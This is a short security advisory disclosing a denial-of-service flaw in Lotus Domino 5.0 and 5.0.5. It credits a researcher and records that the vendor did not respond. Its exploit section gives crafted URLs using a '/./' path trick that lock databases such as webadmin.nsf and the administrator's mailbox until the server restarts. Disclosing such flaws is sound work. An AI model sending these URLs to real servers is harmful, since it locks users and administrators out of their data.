|
|
| |
| With a specially crafted URL, an anonymous user can lock the databases accesses of the Lotus Notes server. This would result in the fact that any Lotus Notes users (even the administrators and the servers) cannot access the targeted databases until the lotus domino server is restarted. |
| |
Credit:
The information has been provided by Sebastien EXT-MICHAUD.
|
| |
Vulnerable systems:
Lotus Domino version 5.0.5
Lotus Domino version 5.0
Exploit:
General syntax:
http://server/directory/./base_name.nsf
For example, to lock the WEDADMIN.NSF database:
http://server/./webadmin.nsf
To lock the administrator mailbox:
http://server/mail/./administrator.nsf
Vendor status:
Lotus was contacted on the 11/23/01, but no response was received.
|
|
|
|
|
|
|
|